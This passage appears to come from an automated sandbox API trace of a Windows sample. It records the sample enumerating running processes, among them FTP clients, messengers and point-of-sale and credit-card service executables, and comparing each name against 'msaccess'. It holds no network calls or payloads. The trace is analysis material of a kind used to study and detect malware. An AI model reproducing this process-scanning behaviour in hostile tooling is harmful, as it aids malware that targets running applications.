lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.191] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0097.191] StrStrIA (lpFirst="smartftp.exe", lpSrch="msaccess") returned 0x0 [0097.191] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.193] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576490 [0097.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3576490, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0097.193] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0097.193] StrStrIA (lpFirst="thunderbird.exe", lpSrch="msaccess") returned 0x0 [0097.193] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0097.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.194] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35764c0 [0097.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35764c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0097.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0097.194] StrStrIA (lpFirst="totalcmd.exe", lpSrch="msaccess") returned 0x0 [0097.194] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.195] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35764d8 [0097.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35764d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0097.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0097.195] StrStrIA (lpFirst="trillian.exe", lpSrch="msaccess") returned 0x0 [0097.195] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.197] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579230 [0097.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3579230, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0097.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0097.197] StrStrIA (lpFirst="webdrive.exe", lpSrch="msaccess") returned 0x0 [0097.197] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.199] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579020 [0097.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3579020, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0097.199] StrStrIA (lpFirst="whatsapp.exe", lpSrch="msaccess") returned 0x0 [0097.199] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.200] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35791e8 [0097.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35791e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0097.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0097.200] StrStrIA (lpFirst="winscp.exe", lpSrch="msaccess") returned 0x0 [0097.200] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.201] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575480 [0097.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575480, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0097.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0097.202] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="msaccess") returned 0x0 [0097.202] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.203] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35754a0 [0097.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35754a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0097.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0097.203] StrStrIA (lpFirst="active-charge.exe", lpSrch="msaccess") returned 0x0 [0097.203] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.204] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579188 [0097.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3579188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0097.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0097.204] StrStrIA (lpFirst="accupos.exe", lpSrch="msaccess") returned 0x0 [0097.204] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.206] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579200 [0097.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3579200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0097.206] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0097.206] StrStrIA (lpFirst="afr38.exe", lpSrch="msaccess") returned 0x0 [0097.206] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.207] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579080 [0097.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3579080, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0097.208] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0097.208] StrStrIA (lpFirst="aldelo.exe", lpSrch="msaccess") returned 0x0 [0097.208] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.209] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35790b0 [0097.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35790b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0097.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0097.209] StrStrIA (lpFirst="ccv_server.exe", lpSrch="msaccess") returned 0x0 [0097.209] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.210] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x35754e0 [0097.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x35754e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0097.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0097.210] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="msaccess") returned 0x0 [0097.210] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.212] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575500 [0097.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575500, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0097.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0097.212] StrStrIA (lpFirst="creditservice.exe", lpSrch="msaccess") returned 0x0 [0097.212] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.213] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579260 [0097.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3579260, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0097.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0097.213] StrStrIA (lpFirst="edcsvr.exe", lpSrch="msaccess") returned 0x0 [0097.213] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.214] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579038 [0097.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3579038, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0097.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0097.215] StrStrIA (lpFirst="fpos.exe", lpSrch="msaccess") returned 0x0 [0097.215] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.216] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579290 [0097.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3579290, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0097.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0097.216] StrStrIA (lpFirst="isspos.exe", lpSrch="msaccess") returned 0x0 [0097.216] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.217] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575540 [0097.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575540, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0097.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0097.217] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="msaccess") returned 0x0 [0097.217] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.219] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35791a0 [0097.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35791a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0097.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0097.219] StrStrIA (lpFirst="omnipos.exe", lpSrch="msaccess") returned 0x0 [0097.219] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.220] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579218 [0097.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3579218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0097.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0097.220] StrStrIA (lpFirst="spcwin.exe", lpSrch="msaccess") returned 0x0 [0097.220] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.232] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357abd8 [0097.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357abd8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0097.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0097.232] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="msaccess") returned 0x0 [0097.232] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.233] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579248 [0097.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3579248, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0097.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0097.233] StrStrIA (lpFirst="utg2.exe", lpSrch="msaccess") returned 0x0 [0097.233] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0097.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.234] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578fc0 [0097.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3578fc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 